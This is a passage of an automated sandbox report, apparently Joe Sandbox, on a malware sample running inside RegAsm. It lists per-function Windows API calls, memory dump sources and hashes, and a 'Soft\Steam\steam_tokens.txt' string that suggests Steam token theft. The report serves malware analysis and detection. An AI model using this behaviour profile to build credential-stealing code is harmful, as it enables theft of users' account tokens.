                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004271CB,?,00000000,004224A0,000000FF,?,00418114,?), ref: 00415497
                                                                                                                                                                                                              • Part of subcall function 004152B0: Sleep.KERNEL32(000003E8,00422461, cA,?,?,?,00000001), ref: 00415375
                                                                                                                                                                                                              • Part of subcall function 004152B0: CreateThread.KERNEL32(00000000,00000000,00413CE0,?,00000000,00000000), ref: 00415396
                                                                                                                                                                                                              • Part of subcall function 004152B0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004153A2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Soft\Steam\steam_tokens.txt, xrefs: 004154AF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                                                                                                                                            • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                            • API String ID: 2356188485-3507145866
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,viB,00000000,00000000,?,00000000), ref: 00411588
                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00417737
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00CC1750), ref: 00417756
                                                                                                                                                                                                              • Part of subcall function 00417420: wsprintfA.USER32 ref: 00417458
                                                                                                                                                                                                              • Part of subcall function 00417420: FindFirstFileA.KERNEL32(?,?), ref: 0041746F
                                                                                                                                                                                                              • Part of subcall function 00417420: StrCmpCA.SHLWAPI(?,0042751C), ref: 004174AC
                                                                                                                                                                                                              • Part of subcall function 00417420: StrCmpCA.SHLWAPI(?,00427520), ref: 004174C6
                                                                                                                                                                                                              • Part of subcall function 00417420: wsprintfA.USER32 ref: 004174EB
                                                                                                                                                                                                              • Part of subcall function 00417420: StrCmpCA.SHLWAPI(?,00427196), ref: 004174FA
                                                                                                                                                                                                              • Part of subcall function 00417420: wsprintfA.USER32 ref: 00417517
                                                                                                                                                                                                              • Part of subcall function 00417420: PathMatchSpecA.SHLWAPI(?,?), ref: 00417547
                                                                                                                                                                                                              • Part of subcall function 00417420: lstrcat.KERNEL32(?,00CBF420), ref: 00417573
                                                                                                                                                                                                              • Part of subcall function 00417420: lstrcat.KERNEL32(?,00427538), ref: 00417585
                                                                                                                                                                                                              • Part of subcall function 00417420: lstrcat.KERNEL32(?,?), ref: 00417593
                                                                                                                                                                                                              • Part of subcall function 00417420: lstrcat.KERNEL32(?,0042753C), ref: 004175A5
                                                                                                                                                                                                              • Part of subcall function 00417420: lstrcat.KERNEL32(?,?), ref: 004175B9
                                                                                                                                                                                                              • Part of subcall function 00417420: wsprintfA.USER32 ref: 00417536
                                                                                                                                                                                                              • Part of subcall function 00417420: FindNextFileA.KERNEL32(000000FF,?), ref: 00417687
                                                                                                                                                                                                              • Part of subcall function 00417420: FindClose.KERNEL32(000000FF), ref: 00417699
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 153043497-0
                                                                                                                                                                                                            • Opcode ID: 980c6c65570b6984db1cb0369e472beaa0b0a8abf634df122684650a0c25765b
                                                                                                                                                                                                            • Instruction ID: 5b0c1268bca937b6c0622831ffd3659b7be3d63a11705933043f84870864bdba
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 980c6c65570b6984db1cb0369e472beaa0b0a8abf634df122684650a0c25765b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A51C7B5900208EBC714EBA4DC42EFE7B7AAB48704F00436EF80567296DB7857548BE5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406A0E,00000000), ref: 004065AF
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406A0E,00000000), ref: 004065E3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                            • Opcode ID: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                            • Instruction ID: 307c63db32dd85507ef60eb9078a071d01a6145ff22a74080f45120ef5a07aab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B021E4713407006BD334CF79DC81BABB7EAEB84714F14492EEA1EDA3D0D679E8408658
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: d9fc23f20392344533ef2d983e31f0e7033ca9f6a2f3c0fdbc76c7e886b2572f
                                                                                                                                                                                                            • Instruction ID: 0c77b343086b070939783159600971ab4d0f9c2096a8bdcc4f1773babb16f5ec
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9fc23f20392344533ef2d983e31f0e7033ca9f6a2f3c0fdbc76c7e886b2572f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55418EB1A002199FDB14DF59D940AAFB7B8AF44354F01807AE80AF7391E638ED60CB95
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00413B11,?,00000001,00000004,?,00413B10,00000000,00000000), ref: 004115CC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocLocal
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3494564517-0
                                                                                                                                                                                                            • Opcode ID: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                            • Instruction ID: e2f45693e22dee64b2117a842d0cd14d1d044b0645625ff153940cded4a5b51e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAF05C36B026113B83120B9D88805A7F79FEFC5E60714012BDB4ACB324C931DC4042E0
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%